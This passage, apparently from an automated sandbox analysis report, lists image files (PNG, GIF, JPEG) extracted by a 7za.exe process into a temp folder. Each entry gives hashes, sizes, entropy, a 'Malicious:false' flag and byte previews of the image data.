      SHA-512:BBD08EA4939B33F61F8FE659053294650749CE4567B1316FBF08983CC408004D7CA1C9EB3C692D78A80757B97B321A20CAF4E4C69D30DEAEA875A5B576A6C2BF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...]...\.....k.m.....sRGB........8eXIfMM.*.......i...........................]...........\.....hE"..@.IDATx....mYY.c..x....LHH.......J#(.**H...Wka.ZZV.maW..U..-u.j-.-ADtQT+ .$$c2d&.d..9.<..qo...}{..{_.{..7E..q...}.s..|...i..+$p.%P*..Wu7......inn...........8.*.Ss.*..*?#.Y.........1..Ouuu=-.p.......K-E%.J....;[[[..//..?(.<(.<..-::.Ba......j.a...........N_..-.t.K...k..]...z....Jk<(..X..;x%..u.&...u............=$P......u.......{....\..c.E1...O.4.-.|^r.........gq.$P...5.7..:...n....)]../Hv...{...\"...)@..f....d7]...a.D.g.(@7.....d.e.x..C:.B..|.....'...t..K......k..hD......q..g.l.I_.............uY...\..b%P...J.*....<33.J5.u.E.z.*n.n.....aM.{.gg.}.V+.Z [......W.........Oq...q.........n...n.W......r...?.y...n."...OC...`~...Z9......@....E..`...6.h./..O.hz.....Id..C....'.(R.\..(@.*.(.k.:^.V..D2..Z.../....~Z..e~..@.=$.w.H...k.B.`;5..........M,f@\~._T...^...ma.m.L.oQ-.,m.{.mm..k].._0?..L....e.Z?.....t..+............B,\!.F$.._..?.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 50 x 41, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2197
      Entropy (8bit):7.882931768714485
      Encrypted:false
      SSDEEP:
      MD5:6FDB8243FF6BD9606A052FDFB48E3EFE
      SHA1:5B89DACF6708BA94C1D75B10D4F0B40F2140113E
      SHA-256:3F00683A1E0CC2565D8DCA467154514E74DE0D3721747AD084A0BC5FD53D4438
      SHA-512:A4C586FC5340A48DA0E4E368C9E1ADA0CDBFB5344E2F564F4B666EBBE2B3F2F09D7AF9779FEF058BBFA67C82598A17A3EB2949E15BF29F7A9CC20F3E69475632
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...2...).....w.z.....sRGB........OIDATh..Xkl\..>s...%1.....8.Lk.{.>.!..6Q.@. B*A.#U*Q!..U...RU.>$B.V@U......$<..&..R.7/.I.7..&..8.....;k..{.......;s.3s.9gf..E....:.....P..'....Y)..>.;.^2.......-f.*.........T.?&.\..d.$..t2.~.O.?..l@2^..UE.5..4O.&.....d....R.}...t]..D...TUJ.m+j...g.-.%.....!o.......m..>.z.2.....g....oE...#...t...D......8..i...J{.Xt...W._....,@...9e......g..#.A.;.No...O..;..!.Bq.....B8.6......7.O..$.)..i.........].Mng......../....e..y..E.w,Zj3E....... x.D..v.D{]o...)..c.{.b...U..Ntz.~i.;..jgk..YT...A....D......^S...,.....^P.n..^^.gK^By.s";..{..{gol.9...@...M0r.@.KM........=.4*...R...-h.3..u.....-..T...p.-p).b....'.KE+...KQ.Z..=.....&..t9@...4./......4...JS..v......p.pt..w.@...., ..i6....@..w.b...4~.....&.w5...8.G^e..D..~..$s........ZE].q<....;1..........U.<.!.).J5e/....HS./..F...a?.i..D.y...i.* D6....Lp7.YyT....z2tq.|.#.h.2..c........?:|a..u.....>..?A8U..`+..H.o9.9t..v...j.........T.M.d<..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 57, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3374
      Entropy (8bit):7.918314095083879
      Encrypted:false
      SSDEEP:
      MD5:6A82095B714BB687A84EE1C11CD19BD1
      SHA1:1CDE4B4E8793E98BA17CEBD745F0BDD9CB39078E
      SHA-256:AFFFDA5F13486447D54470818EC201C783B86E71906847815DC03105AA199163
      SHA-512:C8A39FD496A870E035BC58AD96BFA68BED467CC75B9D970AAB6BF35025425AB7674E6F2914A1C559C03BAAC13F37FA204C1ABFC12AD47871FB89AD0046BD112B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...9.....c......sRGB.........IDATh..Z.PTW.....l...@.(*"" ...hV.I&V.u......2.....d2.,N*.e..2KR&.Y..p..".,....,..........V.......w......".X...R..@1.; ....]..k$.,...M.qR...|.....Z.I){.o.q'..........'.E@(.=..q....C'..~.,..6.M.....A|..E...C.8+..|`?P...t.>.e...9..g......L...Z.... .#...6g..L...A/ .bB".@.p..fG.... .....'....5WS\+_..-.....BA..dZ.T.].%...$$&X...(....Z.J`......9z....x@.e.....|..o..[..}Nh...M...$Q."%.Y.>w...M.FY.Z..F_R. ..o.^...C..O*wW...n..]....Ch.....N0K..i.xC..b....k.$...'.....[......z...9._..Z*vV.|(..-..L.4.5II^..zm...!^&.T.....]....9_.x;..............R..Q...[.M..v;..'.v..G..4.S5..!weQ...Ps?.8.IOW.T.V...|....k.....vb..9...X.....q,..oG:.\...Ix.N`5.1....#...2En...oE.D.4.....5.]u ....C.. ....;.{..*`:....*-(.M..)..M.i.4.a...Dr..D...BS.....C...d..%x.fy?@r...c.Pv.l|%Wj.j.=.P.GB......".I....-.%...@,:.... ..@y._..........f..C.....f-...!A.Ej. ..64^"...e.}..b.....G...^F...:C.!.e|p...W..1.+...)oY..qL.=!A.56|n<.K.."z..........f.!..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):154412
      Entropy (8bit):7.963991989835681
      Encrypted:false
      SSDEEP:
      MD5:9658F4CEE47F0E321FF50B831744CB46
      SHA1:9A4BDB003F8F040E56A47C4AD577B758B3D00820
      SHA-256:17C58845687670AC52B1B7FD6E36F3A93423F72C7D4663964A2D6C85B19E9911
      SHA-512:C5DA6272DAC2BB1A62377722973E5F295E25508F9D632F0A5F13A7E0BC69F7D36A5E51CECBA33B29F10C70657CFC488F3F68A473229964DEF0EA21D77E7AE592
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............}......sRGB........xeXIfMM.*.................>...........F.(...........i.........N...............................................................}.....pHYs..!8..!8.E.1`....iDOT...............(.............:....@.IDATx....].u.O.;.X....P.A.k.{.}..H ..c........{...)....rso.M...8.[Hn..........Z{..3b0....|.3.9g.s...~.........d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):72441
      Entropy (8bit):7.942664483429825
      Encrypted:false
      SSDEEP:
      MD5:1CDF86375475F5FEDC439494F3BBB40E
      SHA1:F117DB3BA1D17E18A9002B6DD60C68B7D270F8E3
      SHA-256:9C6444E7CB0412DC06F66B46AD31B3CF464D7029ACF942EE3E8136F891941430
      SHA-512:22F9F6AD980E4107098BAB58A877A26765F490BB4291113512DEF54C53923882B6F9147CDC48DF3C1C1DAFA70B0DF887345742320B54C7F242768FB7B051ECD7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............}......sRGB........xeXIfMM.*.................>...........F.(...........i.........N...............................................................}.....pHYs..!8..!8.E.1`....iDOT...............(.............7.d..@.IDATx.....U.....>.....C.....{7=....n.EEp..B...AP...y....PKp@q@p.a..=....."2..p.*^.+.*+3.....N...../...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ...B.P ..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):160203
      Entropy (8bit):7.960165672025893
      Encrypted:false
      SSDEEP:
      MD5:88F98FEF3262C421E7A077B3911AD035
      SHA1:D41ACBF5260934DF5FFCC8AAE75045AB533DECE7
      SHA-256:FD16948FEC58CC04AED1464429EE2CF4521AB22100CA7C56D47DDCC1D73DCC36
      SHA-512:7295CAC2864A9BBCBB7BA08D4970A23203E193466E237249E2591DD35D509C5D548E10638004CCDF69649883DDB13DEF980FCA8B62221A8C9B40F68F56E02B75
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............}......sRGB........xeXIfMM.*.................>...........F.(...........i.........N...............................................................}.....pHYs..!8..!8.E.1`....iDOT...............(..........&y.2....@.IDATx....]wu...0..[.7.4.dIV.Y..z.dI.m..]nx.i....CH..@...4.Ih..D.i.~.....}...k.}.Q...i.y>.9s..5G....U>..2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2....@F #....d.2.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 480 x 480, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):77578
      Entropy (8bit):7.957538994830281
      Encrypted:false
      SSDEEP:
      MD5:40353D51881300E6CEA13D94AE01B756
      SHA1:5718F730DCB3349AD6D23972657962663FB38FC1
      SHA-256:AD615EF1F7016826D475FE90B4363CC149B060DE2B9406B4C58CB4A4F1938BEF
      SHA-512:8BC29ECDCE2D5F558DD31A1E2424CD1CA94F72E36EA72A491CBCD46F52762F1F44106C749BCB41E6FECD87F9CBA2BF6898DBC022A5C46F2AE15AAFDA3AC3C734
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............}......sRGB........xeXIfMM.*.................>...........F.(...........i.........N...............................................................}.....pHYs..!8..!8.E.1`....iDOT...............(...........L.ux...@.IDATx.....U...^B]..P..%....o..T.O..Ub.+.**..".*.....7...b.b..i.U.......W.8qN&.V...#..L2OF.s2.s....../.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 1 x 1
      Category:dropped
      Size (bytes):43
      Entropy (8bit):2.7374910194847146
      Encrypted:false
      SSDEEP:
      MD5:DF3E567D6F16D040326C7A0EA29A4F41
      SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
      SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
      SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
      Malicious:false
      Reputation:low
      Preview:GIF89a.............!.......,...........D..;
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 108 x 75, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1188
      Entropy (8bit):7.754675218711322
      Encrypted:false
      SSDEEP:
      MD5:C31D145F4CFCBF08BF2EF230C0416BC7
      SHA1:FA2CCDF8721A3FE789820251EABF0C07DA819A12
      SHA-256:79177C30624B0D282EA926501D5A08A2D04D2A3625F067EA8B238271E1108548
      SHA-512:A10F24A8BCF0EA9D52731347FA8C1D2FF356606197AB9657D1778BEFF6C7532725E0EA3A2D95407D85F56E40E9A12C9B38EBA76C3B19A1A4E58A7AD809D85935
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...l...K.......bC....pHYs...%...%.IR$....VIDATx..\.q.0.}..?....V'.:A.A.A=.....2A..*o.l OPy.....ad..HH...)....G....Nk......v..j...iB.J..a.r.J........,.......`c....alk.....Yn..x..........x.,....Q...(Cb#...e....*.e.K\0i......c...}..XV..,...EZ'a..&H...B!l9h..u...\(a.. .&...0..&...0.G...Ux.Px\C..d..... _f.m..]..Hx;........aV...g...&.+......;...7..qt...&.1.+..Y..8.....dIzX...Z.G=....M.0....0G...9n...U.V......]...:......r.......c...>...k.C.K....{dZ.F.c.X>h....O.?...05.2,i!....E.K?.y....$..@..9.{\...B.[.ou.5q..r%..........%r*`.....HN)/......\.I....g..f.'s"...%.f"L9..s.Po>.kBe.<.}DS...R.,.7...(_.... .. ...s...Q.<..Mm...'L........}.._..%..wK.0.y=0.VyZ.u..N>.i]...(`.......H.x-.-.&U.j..E..:V9..'....^`.0...~..Kia.Q.-[M{.-...r..Fg.S..~.s!....)a.VV.}.(.......t.`.;wv.w.c.1..2.....j@..ZE.[i.[.L......(.KVo.@.%l...j...d.8.N....QM.o7P{.R..b...T....[.+..U1...6...._(.V)..).7..rS..,......W.f.v.[.#.....{q".uN.W.s.......AJ$.......^.]$.z3..h?H}..m}.2....5.V......q
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 42 x 38, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):754
      Entropy (8bit):7.604730445904878
      Encrypted:false
      SSDEEP:
      MD5:D44DB64E4047A27B98BF0B0E8F350445
      SHA1:218AF0F50D20ED53FF6D93BD5C0C2032D0126B76
      SHA-256:B4D8E71F3147202402AE8C64EE6CCE4A58D2946253A6177848EF20E4D8966245
      SHA-512:EE5D7B4332D356B7C2D758061B54D223E6CA29B42F600B0F3FB9C6F62883A319A1F2743A1DD6EEF7DDBE2EDBA61FE73092E30DEFCCACD76715D8B3E62A7F7520
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...*...&........ ....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X.Q.@....C..?...V V@:0.xt..H*P*.X...t........r......../ow....ph..............0..2H.P..pi.....x>.d...r..E(F).s..R3...C~.q#.2.....U.T...S\.5.Q.d..%(....2._.2.....5...D.x.:.7F..e.....Q....l...f...~'.M....E.M.M.i%.+.u{VF.....|......r.h. ....SJ...r.|..Q3m2......L)..{L..@1e.G..0..4....).5.(.qG.7.W.....i...^1....U.#SW.:..........i.a2..}W.".6u'O...U...!.E..B.e.2......X.Q..d..<...9........... ..h".(i.....U..4H9..%.jY.*...-..k......|n9P.?.-/..D..c....sWT"G+.n.]......Q.M...s..Tb.2.....M.>......+WV.@......@..m..,..u.o...*......//.....vvy....?....Yc.@!.?.o$jb....eKL..lR....6.{.0..........X...c....`..Cg.{.[...&..n].......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):668
      Entropy (8bit):7.4786085722008755
      Encrypted:false
      SSDEEP:
      MD5:0266C652297B5EA48DA3F3788FFD5FC4
      SHA1:520ED88300AF3B1EC1D199D33CDA578711FA4CC3
      SHA-256:72C0042E8520A49FE9138B356F014DC2AF1915B7C2BA77E5B5FFA3306B6193E5
      SHA-512:1AAC30C8D6B6395427397A0B357640534D01893E3DB249F8A63407619E857F58ADB1000CB973AA393FB9843D2A40839171CE80A014543F78E174B9B69DD41189
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................9....sRGB.........gAMA......a.....pHYs...........~.....tEXtSoftware.paint.net 4.0.9l3~N....IDATXG....0.E)..(...(..8S.%P....(..(.....&.Q......G..l..i..|.~..[....Y.1R.G.+q...y.M..*. ^z.+.....\..2..G.e....8{..I..).{.pD.....Q.f.0..2i..V7../..0..d.z....]...P[.....]p.ue.......T.....>...J`CZ>.t...........Y=.=.g....j..t.. .e...3..:.i0..Wv.FF..E.i.......7...f.jk@Z.TeP|.N.BAI=...:.......+?Ij.......^...m.U?.Ap;w...\...G.#...3...E.W.N.....g......V3......u.;.;.k...1..G..F....!..;..C...."...:..Ss..WA....S...E2..I....kYpK...u.w...!..8.h.......d.....a.O.........n.P.....V.!'.{.s"..=..&..~..t....u....4.?.D..\.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):686
      Entropy (8bit):7.528952661402083
      Encrypted:false
      SSDEEP:
      MD5:A6D74B4B8B339F6179EAC00BD9C04265
      SHA1:FC9C575E1C4AB3C35258E65F090E1540E27A723F
      SHA-256:FDAD4DBD2784F48A0D52CC0FA97E3051DD88655FEEF8477518B2516530C6C201
      SHA-512:D5DFE83083AF1A1E356AFA923DBA38905B9916D725398CF457E447F9227C53DF63AAA132FEC4ADC596316DE2C6B8B328FE2268B79D8FF0AA40410B9D91ECCCF5
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................9....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<...;IDATx.W.q.0.%......u'(#d........J7`....l@...t}...`..;.$'.'!Y...8&!r..rz.H5.../iG....&...#'RC....!.r.:...D...H..&}.X....G...u...Z...`rW..!.HG.r......YZ..zR..X`e....q.C^..!..j.{./.O...X.6.=....zB..F.Bx.......r....S..H.HA.......<...V..r...>x....1G.x,.S.5.W)...$..G.9}......h..>...f..A.(.d.....V>K..D.*..X..\..@.w.xE..i....I.g....Go...aAJ....U,1Zmb.;.....32............:.i...t.)wo2..Y..[...mdo/.z.L......VM.(.}.@.F.|...7Ld...9Lp.z%.n.....[b.b..>,...*...S...[.^...2...'...+.^..&d..]+.?-.\.J.E..#T..R....S.V......W.\....E..*.n.&.q&. 2L*8B.....\........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):383
      Entropy (8bit):6.92848436519101
      Encrypted:false
      SSDEEP:
      MD5:8495377AAA0A9A244A701DE58CA999D4
      SHA1:43FF7C8E2AD05E04D5242E808D0A25FCBE7BBE28
      SHA-256:F5CDEBB7613EEE0EF18737F77AA98474E71EFB35D564FE32912A2D31BB88CD53
      SHA-512:5354986B7F8C0EB85551432090435A989C715620FC614EF59B72D6A7B8F48F413926D4F35568C718C6F05D6235413CBBA7391499184645B48EF88C50C42E2556
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................9....sRGB.........gAMA......a.....pHYs...........~.....tEXtSoftware.paint.net 4.0.9l3~N....IDATXG.K..@.D...$p.).. ..HA@.H@B$ !..`.C..Y.....;....t)..A..*UP..J.T..R..*...r....V.D$....6..."..^.pc=.E..:...V4.......}.......Fs.kQa.bo.J.|%.U.f.9.._{~.. .?.}....F..6.V4F.....-.\....l.Z.m`..<.".#..o.^.H....*UP..J.T..R..*.TA...}........u....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 64 x 64
      Category:dropped
      Size (bytes):9653
      Entropy (8bit):7.748253612655999
      Encrypted:false
      SSDEEP:
      MD5:99C2A3FF5DE00034BC7FF735FBB18B6D
      SHA1:A5955260E47E5A50DCF85FBAEA242662F2B6682B
      SHA-256:6C66050797F8F102A39F34246D9FCDC37587166DF70CA6270BA8ED2FA17D71D6
      SHA-512:4AFB602AC04E029033B32229DF7A06B9252AF210F79F2788FD3980538FFF31760670651CF6EE4588AF3BFB545EF308FC1966BEE6C1C30140B499AFCCAE22A2E0
      Malicious:false
      Reputation:low
      Preview:GIF89a@.@....D^..............dv..........dr....Lf.......L^...........t........................Lb..........l~................t...........Lb.............................................................!..NETSCAPE2.0.....!.....,.,....@.@....@.pH,..*.f.H.0%.qJ.Z..es;..6..."0...A:n......v..3:.w..c*...H.rq.NtH..w*..f.. .Dy..#u,. ...mY}N^....r.C..]_.f{\kB..il. ...Tpq..*.|.NR..x..`*..N R.{}#.X ..M#.,.#...........Z..|.....U..z....\.TL.4.H.&....P.K.~...j.I.1O....b......b.70..HI"!...c@......Ig..kr..s..%'....S..N.=BI6...M@..19..)._f.0..!X.c9..d.l.#....h..0...0!E......:i.......P.......FWq)-]..7x\`............ov|a.dS..`.\..j..&..F.U...i?n.{..M....<..(]....z...u.D.|5..e..LM.....?....f..|vjt......;.vl^,.m....:.s...]._...w.'.EE.*.0F[...N.KE\...$.d`"...../]...n.........Zu.'H^...A..h.@.......0..."D....h .."Ty....(..&<...`.....@..."....h....U @.....e....S.T.).V.P.|pIpg.v..............\..t.y..*.0.h.z...6.C..)._J`..@z k...Ye.'%...'.0.....@...........F....P.B..NK..>.......RR
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1035
      Entropy (8bit):7.6826827143547565
      Encrypted:false
      SSDEEP:
      MD5:99A1F3D4BD4914C6144566E182367552
      SHA1:E859B99C97C2E3EC349BE205D33F9F848CF4E8F9
      SHA-256:09E2659628C42A253A3C880DDDD0240CF550F3155A75122222F5AA8028EDDEA8
      SHA-512:8493BFB89C148809BBC148232EA5752E63D4F94349A2347D9B54C02170A703AC657B4B690D699FAA6AE398B3EA22D3367E36FEC4EE474E4F6FCC098C94F98159
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB.........IDAT8.cd ........`.............?_>..,>.,.$..CR.}.8;!6..?..`...3\.q....;.$...Q.EV..UJSM....S.o.....;...?.2.x.0..D|{....{.`....,l..TU.....P..u...q%...y...:F....2K... 1..3........\...|..g7.]...`b...../....eddd........RC.........*+#}....?77.h..?.8^$%.X...f..'?....../...n.L9.`]S..m-.YE.i..|.V ..B..W...E..=..-....%....F..3.g.N...R.7..V..p.....C\j..!!.. ....f....}.....>;q....-........[.:...L...v[..T..1.=.v.G...jf....8=....A.].z.+.....7..R2@.df..nnj....ST....w.Aj0....WF~..?..*|fl.....*.k.l..Z...w.k.._....R...q...)|.......&Nf..4.\U...........?:y....aF.xt..iVN!.`.....)~.....\<..>}...V..VT]EaumE.....,_.i..{.r_.~..K`.a....bc8...w=YiI.o.'...o..1q.gg.e..RZ...d.R7i.cw...y..7...`5.d....]..>..27...T..r.)...)..^...........(...#o..$..m."gf........X...k.........k......L..p%E.]!......g.0u6..&V...]...F.4...T.r...abbf.........3.6Ci*..b`y....tK^V.&).~......Oyg.n...\V0...N...eJ...) .>u..CIU.R.Z1.z.....^.n......`M.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):640
      Entropy (8bit):7.4828392877460645
      Encrypted:false
      SSDEEP:
      MD5:7C41B398CAA9A1BA605B8E79BC874710
      SHA1:20121A3218E2BA6EC7BD172BF7F9036E1B554D25
      SHA-256:A737E3383B073105516C52761C36720AEB56BA844B8A20E640C490C01BBCCE20
      SHA-512:DA74748551578C2706DF78C0ACC6DF33BF58409815232556A4D17FCD461956749E44DBFAEA7D6C483DEE02C6E5AA4472925B94AE4693B5A6D83B9027B247E341
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P....IDATXG.T.jBA......&^.(.(*"*."..W....?.?.y.......LK.L`..9..a...k..r.......n.H$...d2..~.............ED0.D8.....[.g.....X.}!..H$.j.0..Q.T.......f.l6X...f.rf(..i?.P.x<~I.h4.B..)V....-r...0;....F4...F....3...C.P....!.....N.Uy<.q.P...n...q.n7..u)hB..f...D.....0_.m.3..z.n.q:..s.....3...1......"..........K.t:-.Z.i.{.$..L....../.S.p.i9.k....wJ./..z.....T.U,.K9c..f...@[0........z.....i*..G8.....|^.8....~,..$..B...$+.J.uv.LA.M..8.......&.....3..)R...c(.@.&.T.H.].0.s>.9.y.....J...8.op......s.<p.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=paint.net 4.0.3], baseline, precision 8, 32x32, components 3
      Category:dropped
      Size (bytes):1020
      Entropy (8bit):6.961736477279269
      Encrypted:false
      SSDEEP:
      MD5:FD7E3A96BECDC7B7B4BD3FF5AE587BA8
      SHA1:23A26C35867669F55816FA7201475AB1459A9587
      SHA-256:A5C341BF598E6148A588A965266F31506EDD5969281A94622D92AB6FF285BE02
      SHA-512:5BD7656AB2E4E7C8A269691F8E231A0628B036FA93C5C937081494963A9D963D82235B2522FDC12F2BCDF237ECC1209C9162F4AE4261BBD26552B157A26B9449
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....fExif..MM.*.................>...........F.(...........1.........N.......`.......`....paint.net 4.0.3....C....................................................................C....................................................................... . .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....<Q...?..z........j...e}...C.sx....b.+.M(.... ..G.y.w......c4......Fs_.?........+.....M......7.^......|I.C}...(d.9$.,..!..z._....=s@.B>..........o_.?.-......?.......|+y.u.4...}..X0!|.;..?{...4...v.............@...........7>..x.....n.Q?...S.......{....!l.[..s...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 10 x 17, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):338
      Entropy (8bit):7.175023217893516
      Encrypted:false
      SSDEEP:
      MD5:D1342FD1D0EB5264BD9043C4566AF3E4
      SHA1:4B61C6F575E570B5EA814794D5725C0F7E60DDA1
      SHA-256:E54F0FEC4CAF9E2194CE9BF5E78D21BE3B1A59BC12BC6D4B017404DA7EDB7497
      SHA-512:1EB0FF286BCE6E4FC62443A0673C933A8CDEB9A59917F5C16CBCCBEED7FB24E35439E575900EA7E57E4F76C325CABD6AFF2F942E41C772BA184285E6017E904F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............#=.....IDAT(.}.=j.P...!......L:.t.........Lm.Zm....P..JD..xy..%..x.{}.{..E.}.y.....iO.0.(...wan.q.Y.$.0@.p...O.."..HD.......i.....M...*7IUU.w.&>.$....Z.8sO...j..!FY...*...U.....<..{c.QLC.....m....M.....>X......7.gcq.3._L.....V....*..!~&..?. ...9.../...O.....B.. `....r..o}.w:.I.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):317
      Entropy (8bit):6.783730937853292
      Encrypted:false
      SSDEEP:
      MD5:A45A364CE4E2A2986BBC7B9F50DF4586
      SHA1:8783E85DA32336AAF4F46B7E4BAC12CC97DE6F6F
      SHA-256:672940078C8473430D930C0296A1378E5730FDA6AC506342FC49157FD652D061
      SHA-512:99F653DD85889888DA66DD62994BDD7CC97548AAF611777EAD82EF393562418381054C936A982EC57C07BFBEE14AE7525325C7006D43BE67538BC4D7933689AB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............A.......IDAT8.cd........Z0>..5FF.U 3X@..p. ....@|*.$......[.4P..O....;..? &.0.5..b.Y 3!>.1.@.H..m... ...Z........l.)...`.......,'#....a^"....GW.n.d... .@WH..d..L=#..... ....@.....Xd....@.....[.....w@.\.2....X...DS....A.C...... v..@..L.!a.C.$...?@>..2...=>.B..?@...j.9.U8......IEND.B`.
